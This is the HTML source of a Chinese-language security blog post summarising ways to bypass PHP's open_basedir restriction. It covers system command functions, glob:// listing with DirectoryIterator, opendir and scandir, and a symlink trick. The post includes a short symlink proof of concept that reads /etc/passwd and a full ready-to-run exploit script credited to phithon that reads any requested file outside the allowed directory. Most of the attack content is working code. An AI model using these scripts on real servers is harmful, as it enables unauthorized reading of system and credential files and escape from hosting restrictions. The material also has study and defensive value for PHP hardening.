

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;dark&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/kd.png">
  <link rel="icon" href="/img/kd.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  
  <title>Bypass open_basedir总结 - SD</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.7.2/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"sd-xd.github.io","root":"/","version":"1.8.11","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>blog of SD</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="Bypass open_basedir总结">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-08-14 19:47" pubdate>
        2021年8月14日 晚上
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      2.3k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      35
       分钟
    </span>
  

  
  
    
      <!-- 不蒜子统计文章PV -->
      <span id="busuanzi_container_page_pv" style="display: none">
        <i class="iconfont icon-eye" aria-hidden="true"></i>
        <span id="busuanzi_value_page_pv"></span> 次
      </span>
    
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">Bypass open_basedir总结</h1>
            
            <div class="markdown-body">
              <h2 id="open-basedir"><a href="#open-basedir" class="headerlink" title="open_basedir"></a>open_basedir</h2><p>open_basedir是php.ini中的一个配置选项，可用于将用户访问文件的活动范围限制在指定的区域。<br>在<code>php.ini</code>中设置<code>open_basedir</code>的值</p>
<p><img src="/img/bypass_open_basedir/1.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="/img/bypass_open_basedir/2.png" srcset="/img/loading.gif" lazyload></p>
<p>设置<code>open_basedir=/var/www/html/</code>,通过web访问服务器的用户就无法获取服务器上除了<code>/var/www/html/</code>这个目录以外的文件。<br>假设这时连接一个webshell,当webshell工具尝试遍历和读取其他目录时将会失败。<br><img src="/img/bypass_open_basedir/3.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="通过系统命令函数"><a href="#通过系统命令函数" class="headerlink" title="通过系统命令函数"></a>通过系统命令函数</h2><p><code>open_basedir</code>对命令执行函数没有限,使用<code>system()</code>函数试一下<br><img src="/img/bypass_open_basedir/4.png" srcset="/img/loading.gif" lazyload></p>
<p>能够遍历上上级目录,而在webshell工具中时被禁止的,说明确实能够绕过<br><img src="/img/bypass_open_basedir/5.png" srcset="/img/loading.gif" lazyload></p>
<p>实际情况中,可能<code>system()</code>函数由于disable_function禁用无法使用,可通过同类执行命令函数绕过。</p>
<h2 id="利用glob-绕过"><a href="#利用glob-绕过" class="headerlink" title="利用glob://绕过"></a>利用glob://绕过</h2><h3 id="glob-伪协议"><a href="#glob-伪协议" class="headerlink" title="glob://伪协议"></a>glob://伪协议</h3><p><code>glob://</code>是查找匹配的文件路径模式,<code>glob</code>数据流包装器自 PHP 5.3.0 起开始有效。<br>下面是<a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/wrappers.glob.php">官方</a>的一个domo</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-comment">// 循环 ext/spl/examples/ 目录里所有 *.php 文件</span><br><span class="hljs-comment">// 并打印文件名和文件尺寸</span><br><span class="hljs-variable">$it</span> = <span class="hljs-keyword">new</span> <span class="hljs-built_in">DirectoryIterator</span>(<span class="hljs-string">&quot;glob://ext/spl/examples/*.php&quot;</span>);<br><span class="hljs-keyword">foreach</span>(<span class="hljs-variable">$it</span> <span class="hljs-keyword">as</span> <span class="hljs-variable">$f</span>) &#123;<br>    printf(<span class="hljs-string">&quot;%s: %.1FK\n&quot;</span>, <span class="hljs-variable">$f</span>-&gt;getFilename(), <span class="hljs-variable">$f</span>-&gt;getSize()/<span class="hljs-number">1024</span>);<br>&#125;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>
<p>需要和其他函数配合,单独的glob是无法绕过的。<br>并且局限性在于它们都只能列出根目录下和open_basedir指定的目录下的文件，不能列出除前面的目录以外的目录中的文件，且不能读取文件内容。</p>
<h3 id="利用-DirectoryIterator-glob"><a href="#利用-DirectoryIterator-glob" class="headerlink" title="利用 DirectoryIterator+glob://"></a>利用 DirectoryIterator+glob://</h3><p><code>DirectoryIterator</code> 类提供了一个简单的界面来查看文件系统目录的内容。<br>脚本如下:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$c</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;c&#x27;</span>];<br><span class="hljs-variable">$a</span> = <span class="hljs-keyword">new</span> <span class="hljs-built_in">DirectoryIterator</span>(<span class="hljs-variable">$c</span>);<br><span class="hljs-keyword">foreach</span>(<span class="hljs-variable">$a</span> <span class="hljs-keyword">as</span> <span class="hljs-variable">$f</span>)&#123;<br>    <span class="hljs-keyword">echo</span>(<span class="hljs-variable">$f</span>-&gt;__toString().<span class="hljs-string">&#x27;&lt;br&gt;&#x27;</span>);<br>&#125;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>
<p><img src="/img/bypass_open_basedir/6.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="利用-opendir-readdir-glob"><a href="#利用-opendir-readdir-glob" class="headerlink" title="利用 opendir()+readdir()+glob://"></a>利用 opendir()+readdir()+glob://</h3><p><code>opendir</code>作用为打开目录句柄<br><code>readdir</code>作用为从目录句柄中读取目录</p>
<p>脚本如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$a</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;c&#x27;</span>];<br><span class="hljs-keyword">if</span> ( <span class="hljs-variable">$b</span> = opendir(<span class="hljs-variable">$a</span>) ) &#123;<br>    <span class="hljs-keyword">while</span> ( (<span class="hljs-variable">$file</span> = readdir(<span class="hljs-variable">$b</span>)) !== <span class="hljs-literal">false</span> ) &#123;<br>        <span class="hljs-keyword">echo</span> <span class="hljs-variable">$file</span>.<span class="hljs-string">&quot;&lt;br&gt;&quot;</span>;<br>    &#125;<br>    closedir(<span class="hljs-variable">$b</span>);<br>&#125;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>
<p>只能列目录，php7可以用如下方法读非根目录文件,<code>glob:///*/www/../*</code> 可列举 <code>/var</code></p>
<p><img src="/img/bypass_open_basedir/7.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="利用-scandir-glob"><a href="#利用-scandir-glob" class="headerlink" title="利用 scandir()+glob://"></a>利用 scandir()+glob://</h3><p><code>scandir()</code>函数可以列出指定路径中的文件和目录<br><img src="/img/bypass_open_basedir/8.png" srcset="/img/loading.gif" lazyload></p>
<p>这种方法也只能列出根目录和open_basedir允许目录下的文件。</p>
<h2 id="利用symlink绕过"><a href="#利用symlink绕过" class="headerlink" title="利用symlink绕过"></a>利用symlink绕过</h2><p><code>symlink()</code>函数创建一个从指定名称连接的现存目标文件开始的符号连接。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">symlink(<span class="hljs-keyword">string</span> <span class="hljs-variable">$target</span>, <span class="hljs-keyword">string</span> <span class="hljs-variable">$link</span>): <span class="hljs-keyword">bool</span><br></code></pre></td></tr></table></figure>
<p>symlink()对于已有的 target 建立一个名为 link 的符号连接。<br>而target一般情况下受限于open_basedir。<br>官方的domo:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$target</span> = <span class="hljs-string">&#x27;uploads.php&#x27;</span>;<br><span class="hljs-variable">$link</span> = <span class="hljs-string">&#x27;uploads&#x27;</span>;<br>symlink(<span class="hljs-variable">$target</span>, <span class="hljs-variable">$link</span>);<br><br><span class="hljs-keyword">echo</span> readlink(<span class="hljs-variable">$link</span>);<br><span class="hljs-comment"># 将会输出&#x27;uploads.php&#x27;这个字符串</span><br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>如果将要读取<code>/etc/passwd</code>poc如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br>mkdir(<span class="hljs-string">&quot;A&quot;</span>);<br>chdir(<span class="hljs-string">&quot;A&quot;</span>);<br>mkdir(<span class="hljs-string">&quot;B&quot;</span>);<br>chdir(<span class="hljs-string">&quot;B&quot;</span>);<br>mkdir(<span class="hljs-string">&quot;C&quot;</span>);<br>chdir(<span class="hljs-string">&quot;C&quot;</span>);<br>mkdir(<span class="hljs-string">&quot;D&quot;</span>);<br>chdir(<span class="hljs-string">&quot;D&quot;</span>);<br>chdir(<span class="hljs-string">&quot;..&quot;</span>);<br>chdir(<span class="hljs-string">&quot;..&quot;</span>);<br>chdir(<span class="hljs-string">&quot;..&quot;</span>);<br>chdir(<span class="hljs-string">&quot;..&quot;</span>);<br>symlink(<span class="hljs-string">&quot;A/B/C/D&quot;</span>,<span class="hljs-string">&quot;SD&quot;</span>);<br>symlink(<span class="hljs-string">&quot;SD/../../../../etc/passwd&quot;</span>,<span class="hljs-string">&quot;POC&quot;</span>);<br>unlink(<span class="hljs-string">&quot;SD&quot;</span>);<br>mkdir(<span class="hljs-string">&quot;SD&quot;</span>);<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>访问web后,将会生成名为POC的文件<br><img src="/img/bypass_open_basedir/9.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="/img/bypass_open_basedir/10.png" srcset="/img/loading.gif" lazyload></p>
<p>分析一下poc过程:</p>
<ol>
<li>创建A/B/C/D目录，并返回到起始目录</li>
<li><code>symlink(&quot;A/B/C/D&quot;,&quot;SD&quot;)</code>:创建符号文件SD,指向A/B/C/D</li>
<li><code>symlink(&quot;SD/../../../../etc/passwd&quot;,&quot;POC&quot;)</code>:创建符号文件POC,指向<code>SD/../../../../etc/passwd</code>。此时SD=A/B/C/D,而<code>A/B/C/D../../../../</code>=<code>/var/www/html</code>,符合open_basedir的限制,创建成功。</li>
<li>unlink(“SD”):删除软链接SD，并创建一个文件夹,此时SD作为一个真正的目录存在。那么访问POC,指向的是<code>SD/../../../../etc/passwd</code>,<code>SD/../../../</code>就是/var目录,<code>/var/../etc/passwd</code>恰好可以读取到etc目录下的passwd，从而达到跨目录访问的效果。</li>
</ol>
<p>这里需要跨几层目录就需要创建几层目录。</p>
<p>最后附上p牛EXP</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-comment">/* * by phithon * From https://www.leavesongs.com * detail: http://cxsecurity.com/issue/WLB-2009110068 */</span><br>header(<span class="hljs-string">&#x27;content-type: text/plain&#x27;</span>);<br>error_reporting(-<span class="hljs-number">1</span>);<br>ini_set(<span class="hljs-string">&#x27;display_errors&#x27;</span>, <span class="hljs-literal">TRUE</span>);<br>printf(<span class="hljs-string">&quot;open_basedir: %s\nphp_version: %s\n&quot;</span>, ini_get(<span class="hljs-string">&#x27;open_basedir&#x27;</span>), phpversion());<br>printf(<span class="hljs-string">&quot;disable_functions: %s\n&quot;</span>, ini_get(<span class="hljs-string">&#x27;disable_functions&#x27;</span>));<br><span class="hljs-variable">$file</span> = str_replace(<span class="hljs-string">&#x27;\\&#x27;</span>, <span class="hljs-string">&#x27;/&#x27;</span>, <span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_REQUEST</span>[<span class="hljs-string">&#x27;file&#x27;</span>]) ? <span class="hljs-variable">$_REQUEST</span>[<span class="hljs-string">&#x27;file&#x27;</span>] : <span class="hljs-string">&#x27;/etc/passwd&#x27;</span>);<br><span class="hljs-variable">$relat_file</span> = getRelativePath(<span class="hljs-keyword">__FILE__</span>, <span class="hljs-variable">$file</span>);<br><span class="hljs-variable">$paths</span> = explode(<span class="hljs-string">&#x27;/&#x27;</span>, <span class="hljs-variable">$file</span>);<br><span class="hljs-variable">$name</span> = mt_rand() % <span class="hljs-number">999</span>;<br><span class="hljs-variable">$exp</span> = getRandStr();<br>mkdir(<span class="hljs-variable">$name</span>);<br>chdir(<span class="hljs-variable">$name</span>);<br><span class="hljs-keyword">for</span>(<span class="hljs-variable">$i</span> = <span class="hljs-number">1</span> ; <span class="hljs-variable">$i</span> &lt; count(<span class="hljs-variable">$paths</span>) - <span class="hljs-number">1</span> ; <span class="hljs-variable">$i</span>++)&#123;<br>    mkdir(<span class="hljs-variable">$paths</span>[<span class="hljs-variable">$i</span>]);<br>    chdir(<span class="hljs-variable">$paths</span>[<span class="hljs-variable">$i</span>]);<br>&#125;<br>mkdir(<span class="hljs-variable">$paths</span>[<span class="hljs-variable">$i</span>]);<br><span class="hljs-keyword">for</span> (<span class="hljs-variable">$i</span> -= <span class="hljs-number">1</span>; <span class="hljs-variable">$i</span> &gt; <span class="hljs-number">0</span>; <span class="hljs-variable">$i</span>--) &#123; <br>    chdir(<span class="hljs-string">&#x27;..&#x27;</span>);<br>&#125;<br><span class="hljs-variable">$paths</span> = explode(<span class="hljs-string">&#x27;/&#x27;</span>, <span class="hljs-variable">$relat_file</span>);<br><span class="hljs-variable">$j</span> = <span class="hljs-number">0</span>;<br><span class="hljs-keyword">for</span> (<span class="hljs-variable">$i</span> = <span class="hljs-number">0</span>; <span class="hljs-variable">$paths</span>[<span class="hljs-variable">$i</span>] == <span class="hljs-string">&#x27;..&#x27;</span>; <span class="hljs-variable">$i</span>++) &#123; <br>    mkdir(<span class="hljs-variable">$name</span>);<br>    chdir(<span class="hljs-variable">$name</span>);<br>    <span class="hljs-variable">$j</span>++;<br>&#125;<br><span class="hljs-keyword">for</span> (<span class="hljs-variable">$i</span> = <span class="hljs-number">0</span>; <span class="hljs-variable">$i</span> &lt;= <span class="hljs-variable">$j</span>; <span class="hljs-variable">$i</span>++) &#123; <br>    chdir(<span class="hljs-string">&#x27;..&#x27;</span>);<br>&#125;<br><span class="hljs-variable">$tmp</span> = array_fill(<span class="hljs-number">0</span>, <span class="hljs-variable">$j</span> + <span class="hljs-number">1</span>, <span class="hljs-variable">$name</span>);<br>symlink(implode(<span class="hljs-string">&#x27;/&#x27;</span>, <span class="hljs-variable">$tmp</span>), <span class="hljs-string">&#x27;tmplink&#x27;</span>);<br><span class="hljs-variable">$tmp</span> = array_fill(<span class="hljs-number">0</span>, <span class="hljs-variable">$j</span>, <span class="hljs-string">&#x27;..&#x27;</span>);<br>symlink(<span class="hljs-string">&#x27;tmplink/&#x27;</span> . implode(<span class="hljs-string">&#x27;/&#x27;</span>, <span class="hljs-variable">$tmp</span>) . <span class="hljs-variable">$file</span>, <span class="hljs-variable">$exp</span>);<br>unlink(<span class="hljs-string">&#x27;tmplink&#x27;</span>);<br>mkdir(<span class="hljs-string">&#x27;tmplink&#x27;</span>);<br>delfile(<span class="hljs-variable">$name</span>);<br><span class="hljs-variable">$exp</span> = dirname(<span class="hljs-variable">$_SERVER</span>[<span class="hljs-string">&#x27;SCRIPT_NAME&#x27;</span>]) . <span class="hljs-string">&quot;/<span class="hljs-subst">&#123;$exp&#125;</span>&quot;</span>;<br><span class="hljs-variable">$exp</span> = <span class="hljs-string">&quot;http://<span class="hljs-subst">&#123;$_SERVER[&#x27;SERVER_NAME&#x27;]&#125;</span><span class="hljs-subst">&#123;$exp&#125;</span>&quot;</span>;<br><span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;\n-----------------content---------------\n\n&quot;</span>;<br><span class="hljs-keyword">echo</span> file_get_contents(<span class="hljs-variable">$exp</span>);<br>delfile(<span class="hljs-string">&#x27;tmplink&#x27;</span>);<br><br><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">getRelativePath</span>(<span class="hljs-params"><span class="hljs-variable">$from</span>, <span class="hljs-variable">$to</span></span>) </span>&#123;<br>  <span class="hljs-comment">// some compatibility fixes for Windows paths</span><br>  <span class="hljs-variable">$from</span> = rtrim(<span class="hljs-variable">$from</span>, <span class="hljs-string">&#x27;\/&#x27;</span>) . <span class="hljs-string">&#x27;/&#x27;</span>;<br>  <span class="hljs-variable">$from</span> = str_replace(<span class="hljs-string">&#x27;\\&#x27;</span>, <span class="hljs-string">&#x27;/&#x27;</span>, <span class="hljs-variable">$from</span>);<br>  <span class="hljs-variable">$to</span>   = str_replace(<span class="hljs-string">&#x27;\\&#x27;</span>, <span class="hljs-string">&#x27;/&#x27;</span>, <span class="hljs-variable">$to</span>);<br><br>  <span class="hljs-variable">$from</span>   = explode(<span class="hljs-string">&#x27;/&#x27;</span>, <span class="hljs-variable">$from</span>);<br>  <span class="hljs-variable">$to</span>     = explode(<span class="hljs-string">&#x27;/&#x27;</span>, <span class="hljs-variable">$to</span>);<br>  <span class="hljs-variable">$relPath</span>  = <span class="hljs-variable">$to</span>;<br><br>  <span class="hljs-keyword">foreach</span>(<span class="hljs-variable">$from</span> <span class="hljs-keyword">as</span> <span class="hljs-variable">$depth</span> =&gt; <span class="hljs-variable">$dir</span>) &#123;<br>    <span class="hljs-comment">// find first non-matching dir</span><br>    <span class="hljs-keyword">if</span>(<span class="hljs-variable">$dir</span> === <span class="hljs-variable">$to</span>[<span class="hljs-variable">$depth</span>]) &#123;<br>      <span class="hljs-comment">// ignore this directory</span><br>      array_shift(<span class="hljs-variable">$relPath</span>);<br>    &#125; <span class="hljs-keyword">else</span> &#123;<br>      <span class="hljs-comment">// get number of remaining dirs to $from</span><br>      <span class="hljs-variable">$remaining</span> = count(<span class="hljs-variable">$from</span>) - <span class="hljs-variable">$depth</span>;<br>      <span class="hljs-keyword">if</span>(<span class="hljs-variable">$remaining</span> &gt; <span class="hljs-number">1</span>) &#123;<br>        <span class="hljs-comment">// add traversals up to first matching dir</span><br>        <span class="hljs-variable">$padLength</span> = (count(<span class="hljs-variable">$relPath</span>) + <span class="hljs-variable">$remaining</span> - <span class="hljs-number">1</span>) * -<span class="hljs-number">1</span>;<br>        <span class="hljs-variable">$relPath</span> = array_pad(<span class="hljs-variable">$relPath</span>, <span class="hljs-variable">$padLength</span>, <span class="hljs-string">&#x27;..&#x27;</span>);<br>        <span class="hljs-keyword">break</span>;<br>      &#125; <span class="hljs-keyword">else</span> &#123;<br>        <span class="hljs-variable">$relPath</span>[<span class="hljs-number">0</span>] = <span class="hljs-string">&#x27;./&#x27;</span> . <span class="hljs-variable">$relPath</span>[<span class="hljs-number">0</span>];<br>      &#125;<br>    &#125;<br>  &#125;<br>  <span class="hljs-keyword">return</span> implode(<span class="hljs-string">&#x27;/&#x27;</span>, <span class="hljs-variable">$relPath</span>);<br>&#125;<br><br><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">delfile</span>(<span class="hljs-params"><span class="hljs-variable">$deldir</span></span>)</span>&#123;<br>    <span class="hljs-keyword">if</span> (@is_file(<span class="hljs-variable">$deldir</span>)) &#123;<br>        @chmod(<span class="hljs-variable">$deldir</span>,<span class="hljs-number">0777</span>);<br>        <span class="hljs-keyword">return</span> @unlink(<span class="hljs-variable">$deldir</span>);<br>    &#125;<span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span>(@is_dir(<span class="hljs-variable">$deldir</span>))&#123;<br>        <span class="hljs-keyword">if</span>((<span class="hljs-variable">$mydir</span> = @opendir(<span class="hljs-variable">$deldir</span>)) == <span class="hljs-literal">NULL</span>) <span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;<br>        <span class="hljs-keyword">while</span>(<span class="hljs-literal">false</span> !== (<span class="hljs-variable">$file</span> = @readdir(<span class="hljs-variable">$mydir</span>)))<br>        &#123;<br>            <span class="hljs-variable">$name</span> = File_Str(<span class="hljs-variable">$deldir</span>.<span class="hljs-string">&#x27;/&#x27;</span>.<span class="hljs-variable">$file</span>);<br>            <span class="hljs-keyword">if</span>((<span class="hljs-variable">$file</span>!=<span class="hljs-string">&#x27;.&#x27;</span>) &amp;&amp; (<span class="hljs-variable">$file</span>!=<span class="hljs-string">&#x27;..&#x27;</span>))&#123;delfile(<span class="hljs-variable">$name</span>);&#125;<br>        &#125; <br>        @closedir(<span class="hljs-variable">$mydir</span>);<br>        @chmod(<span class="hljs-variable">$deldir</span>,<span class="hljs-number">0777</span>);<br>        <span class="hljs-keyword">return</span> @rmdir(<span class="hljs-variable">$deldir</span>) ? <span class="hljs-literal">true</span> : <span class="hljs-literal">false</span>;<br>    &#125;<br>&#125;<br><br><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">File_Str</span>(<span class="hljs-params"><span class="hljs-variable">$string</span></span>)</span><br><span class="hljs-function"></span>&#123;<br>    <span class="hljs-keyword">return</span> str_replace(<span class="hljs-string">&#x27;//&#x27;</span>,<span class="hljs-string">&#x27;/&#x27;</span>,str_replace(<span class="hljs-string">&#x27;\\&#x27;</span>,<span class="hljs-string">&#x27;/&#x27;</span>,<span class="hljs-variable">$string</span>));<br>&#125;<br><br><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">getRandStr</span>(<span class="hljs-params"><span class="hljs-variable">$length</span> = <span class="hljs-number">6</span></span>) </span>&#123;<br>    <span class="hljs-variable">$chars</span> = <span class="hljs-string">&#x27;abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789&#x27;</span>;<br>    <span class="hljs-variable">$randStr</span> = <span class="hljs-string">&#x27;&#x27;</span>;<br>    <span class="hljs-keyword">for</span> (<span class="hljs-variable">$i</span> = <span class="hljs-number">0</span>; <span class="hljs-variable">$i</span> &lt; <span class="hljs-variable">$length</span>; <span class="hljs-variable">$i</span>++) &#123;<br>        <span class="hljs-variable">$randStr</span> .= substr(<span class="hljs-variable">$chars</span>, mt_rand(<span class="hljs-number">0</span>, strlen(<span class="hljs-variable">$chars</span>) - <span class="hljs-number">1</span>), <span class="hljs-number">1</span>);<br>    &#125;<br>    <span class="hljs-keyword">return</span> <span class="hljs-variable">$randStr</span>;<br>&#125;<br></code></pre></td></tr></table></figure>

